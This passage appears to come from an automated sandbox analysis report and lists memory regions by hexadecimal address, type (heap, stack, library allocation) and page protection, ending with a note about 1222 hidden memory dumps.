|
page read and write
|
||
4538000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
4328000
|
heap
|
page read and write
|
||
3192000
|
heap
|
page read and write
|
||
45AB000
|
heap
|
page read and write
|
||
221258E0000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
5E77000
|
trusted library allocation
|
page read and write
|
||
406D000
|
heap
|
page read and write
|
||
2A24000
|
trusted library allocation
|
page read and write
|
||
4D62000
|
trusted library allocation
|
page read and write
|
||
4531000
|
heap
|
page read and write
|
||
22125748000
|
heap
|
page read and write
|
||
3D53000
|
heap
|
page read and write
|
||
45AC000
|
heap
|
page read and write
|
||
77B4F7D000
|
stack
|
page read and write
|
||
288C000
|
stack
|
page read and write
|
||
22127563000
|
trusted library allocation
|
page read and write
|
||
3192000
|
heap
|
page read and write
|
||
1670000
|
trusted library allocation
|
page execute and read and write
|
||
C22000
|
trusted library allocation
|
page read and write
|
||
4536000
|
heap
|
page read and write
|
||
17DBF71A000
|
heap
|
page read and write
|
||
453F000
|
heap
|
page read and write
|
||
4530000
|
direct allocation
|
page read and write
|
||
C00000
|
trusted library allocation
|
page read and write
|
||
4539000
|
heap
|
page read and write
|
||
45AC000
|
heap
|
page read and write
|
||
2A07000
|
trusted library allocation
|
page read and write
|
||
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
45A0000
|
heap
|
page read and write
|
||
45AC000
|
heap
|
page read and write
|
||
4538000
|
heap
|
page read and write
|
||
45AB000
|
heap
|
page read and write
|
||
3CAB000
|
heap
|
page read and write
|
||
6608000
|
heap
|
page read and write
|
||
4535000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
58D0000
|
trusted library allocation
|
page read and write
|
||
8F9000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4531000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
66A0000
|
trusted library allocation
|
page execute and read and write
|
||
4538000
|
heap
|
page read and write
|
||
4413000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
4538000
|
heap
|
page read and write
|
||
3FBC000
|
heap
|
page read and write
|
||
22125640000
|
heap
|
page read and write
|
||
5DAE000
|
stack
|
page read and write
|
||
4329000
|
heap
|
page read and write
|
||
BF3000
|
trusted library allocation
|
page execute and read and write
|
||
3D56000
|
heap
|
page read and write
|
||
C04000
|
trusted library allocation
|
page read and write
|
||
E60000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
408E000
|
heap
|
page read and write
|
||
17DBF840000
|
heap
|
page read and write
|
||
65C2000
|
trusted library allocation
|
page read and write
|
||
17DBF6C3000
|
heap
|
page read and write
|
||
410C000
|
heap
|
page read and write
|
||
2987000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
17DBF672000
|
heap
|
page read and write
|
||
5BF0000
|
heap
|
page read and write
|
||
42D9AFF000
|
stack
|
page read and write
|
||
3195000
|
heap
|
page read and write
|
||
45A8000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
3199000
|
heap
|
page read and write
|
||
1611000
|
heap
|
page read and write
|
||
42D92FA000
|
stack
|
page read and write
|
||
C19000
|
heap
|
page read and write
|
||
221276DB000
|
trusted library allocation
|
page read and write
|
||
343A000
|
trusted library allocation
|
page read and write
|
||
4324000
|
heap
|
page read and write
|
||
432B000
|
heap
|
page read and write
|
||
45AA000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
3192000
|
heap
|
page read and write
|
||
349A000
|
trusted library allocation
|
page read and write
|
||
45AE000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
2A93000
|
trusted library allocation
|
page read and write
|
||
2213FACF000
|
heap
|
page read and write
|
||
4324000
|
heap
|
page read and write
|
||
3F3E000
|
heap
|
page read and write
|
||
C12000
|
trusted library allocation
|
page read and write
|
||
77B610D000
|
stack
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
22129169000
|
trusted library allocation
|
page read and write
|
||
C27000
|
trusted library allocation
|
page execute and read and write
|
||
662D000
|
heap
|
page read and write
|
||
500C000
|
stack
|
page read and write
|
||
4531000
|
heap
|
page read and write
|
||
3193000
|
heap
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
B6D000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
There are 1222 hidden memdumps, click here to show them.